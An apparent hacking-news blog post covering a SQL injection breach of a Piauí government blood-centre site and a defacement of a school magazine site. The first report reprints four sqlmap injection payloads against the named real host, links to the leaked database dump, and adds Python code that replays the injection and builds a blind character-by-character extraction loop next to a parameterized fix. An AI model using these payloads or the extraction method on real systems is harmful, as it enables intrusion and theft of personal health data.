Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, on December 31st 2018, the hackers "Shizen" and "Ftp" of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brazil, and leaked online the contents of databases tied to the Hematology and Hemotherapy Center of Piauí. Having covered Shizen many times in the past, this appears to be the first hack carried out under the banner of New World Hackers, after previous hacks conducted on behalf of Pryzraky, perhaps indicating a change of teams or allegiances.

Regardless, as proof of the hack, in a data dump posted to Twitter this morning the hackers published a mirror of the site's contents, 21 databases in all. Judging from the dump, the group gained access to the site's databases through SQL injection in a request parameter that the site's administrators had left unaddressed; the fingerprint included in the dump shows PHP 5.3.3 on an Apache 2.2.16 web server with a MySQL 5.0 back end. In another surprising move, Shizen also released the exact vulnerabilities found and the payloads delivered, within the leak itself, something normally redacted or kept private.

For example, here are the four SQL injection findings listed in the leak, in sqlmap's reporting format. Note that all four are the same injection point, the id parameter of the page hit, exercised through four different techniques (boolean-based blind, error-based, time-based blind and UNION); sqlmap reports each technique that works against a parameter as a separate entry.

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13' AND 7214=7214 AND 'aWjt'='aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13' AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lEbP'='lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13' AND SLEEP(5) AND 'ouoQ'='ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=13' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)-- EKMl

The hex constants 0x716a767071 and 0x716a716a71 in the error-based and UNION payloads decode to the ASCII strings qjvpq and qjqjq: random delimiters that sqlmap wraps around any value it pulls from the database so it can locate that value in the returned page. The long 0x7854... constant is likewise a random 40-character string, used only to confirm that the fourth UNION column is echoed back in the page.
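To show what the boolean-based and UNION entries above actually buy an attacker, here is an added example (not code from the original post or from the site) that reproduces the class of bug behind them: a lookup that splices the id parameter into SQL text. It runs against an in-memory SQLite database with a constructed four-column table; sqlmap's boolean payload from the dump is used unchanged, while the UNION payload is adapted because CONCAT() and 0x... string literals are MySQL-only, and it is pointed at a second constructed table to show what the confirmed column count is used for. It also goes one step beyond the dump by turning the boolean payload into an oracle that recovers a string one character per request, which is how blind injection leaks data when nothing is echoed back.

```python
import sqlite3

# Constructed stand-in for the site's "id" lookup. The table has four columns,
# matching the "4 columns" sqlmap reported; the data is invented.
ROWS = [
    ("13", "Doacao de sangue", "Horarios de coleta", "editor"),
    ("14", "Campanha", "Texto da campanha", "editor"),
]

# sqlmap's boolean payload from the dump, unchanged, plus a hypothetical
# negative control that differs only in the comparison being false.
TRUE_PAYLOAD = "13' AND 7214=7214 AND 'aWjt'='aWjt"
FALSE_PAYLOAD = "13' AND 7214=7215 AND 'aWjt'='aWjt"

# The UNION payload, adapted: || replaces CONCAT(), plain strings replace
# 0x... literals (decoded: 0x716a767071 = qjvpq, 0x716a716a71 = qjqjq), and
# the SELECT reads from a constructed users table instead of a marker string.
UNION_PAYLOAD = ("13' UNION ALL SELECT NULL,NULL,NULL,"
                 "'qjvpq'||pwhash||'qjqjq' FROM users -- EKMl")
MARK_L, MARK_R = "qjvpq", "qjqjq"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT, title TEXT, body TEXT, author TEXT)")
    conn.executemany("INSERT INTO items VALUES (?,?,?,?)", ROWS)
    conn.execute("CREATE TABLE users (login TEXT, pwhash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', '$1$abc$fakehash')")  # fake
    return conn


def lookup_vulnerable(conn, raw_id):
    """The bug: the request parameter is spliced into SQL text, so a quote in
    the input closes the literal and everything after it is parsed as SQL."""
    sql = f"SELECT id, title, body, author FROM items WHERE id = '{raw_id}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, raw_id):
    """The fix: bind the value; the driver never interprets it as SQL."""
    sql = "SELECT id, title, body, author FROM items WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def extract_marked(rows):
    """What sqlmap does with a UNION response: keep only what sits between its
    two random delimiters and ignore the page's legitimate content."""
    found = []
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and MARK_L in cell and MARK_R in cell:
                start = cell.index(MARK_L) + len(MARK_L)
                found.append(cell[start:cell.index(MARK_R, start)])
    return found


def blind_oracle(conn, condition):
    """Boolean-based blind: the response only reveals whether row 13 came
    back, but that is one true/false SQL condition evaluated per request."""
    payload = f"13' AND ({condition}) AND 'aWjt'='aWjt"
    return len(lookup_vulnerable(conn, payload)) > 0


def blind_extract(conn, subquery, charset="abcdefghijklmnopqrstuvwxyz0123456789$"):
    """Recover a string by asking the oracle substr(x, i, 1) = c for each
    candidate c at each position; stops when no candidate matches."""
    out = ""
    while True:
        pos = len(out) + 1
        hit = next((c for c in charset
                    if blind_oracle(conn, f"substr(({subquery}),{pos},1)='{c}'")),
                   None)
        if hit is None:
            return out
        out += hit


if __name__ == "__main__":
    db = make_db()
    print("boolean true :", lookup_vulnerable(db, TRUE_PAYLOAD))
    print("boolean false:", lookup_vulnerable(db, FALSE_PAYLOAD))
    print("union leak   :", extract_marked(lookup_vulnerable(db, UNION_PAYLOAD)))
    print("blind login  :", blind_extract(db, "SELECT login FROM users LIMIT 1"))
    print("fixed lookup :", lookup_fixed(db, TRUE_PAYLOAD))
```

The two lookups differ by one thing, whether the parameter is data or SQL text, and that is the whole fix; the parameterized version returns nothing for every payload above because no row has that literal string as its id. The blind loop also shows why the time-based entry matters: when the page gives no visible true/false difference, SLEEP(5) turns response time into the same one-bit oracle.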

Raw Database Leak: https://ghostbin.com/paste/6w4ok


https://twitter.com/__sh1z3n/status/1079589738355531777

Nodes Digital Magazine PWNED by Knushh

In a posting on Twitter on December 17th 2018, hacker "Knushh" proudly displayed his most recent hack, a complete defacement of Nodes Digital Magazine. Upon visiting the website, instead of the latest cyber news it was designed to display, users are greeted with a list of 25 indexes and databases attached to the site's Apache 2.4.18 web server. Then, on clicking any of the tables listed, you are brought to pages misconfigured and defaced to display the following message:

[Image: the defacement message displayed on the site]

Translated into English, this essentially reads "motivated for no other reason than to disfigure – lulz." It is important to note that it was not just the website's main PHP entry point that was hacked: literally every page affiliated with the website has been defaced with the same message and image, indicating that the entire website was completely and utterly "pwned" by Knushh. Not only this, but more than 48 hours later the website has yet to be fixed or restored to its original state, suggesting either that Knushh was also able to change the website's login credentials and lock the site's administrators out entirely, or that they are completely unaware of the incident altogether.

At the time of writing no databases attached to or affiliated with the site have been leaked online.

Website Affected: hxxp://revistaescolarnodos.com/

https://twitter.com/Knushh/status/1074903753260785664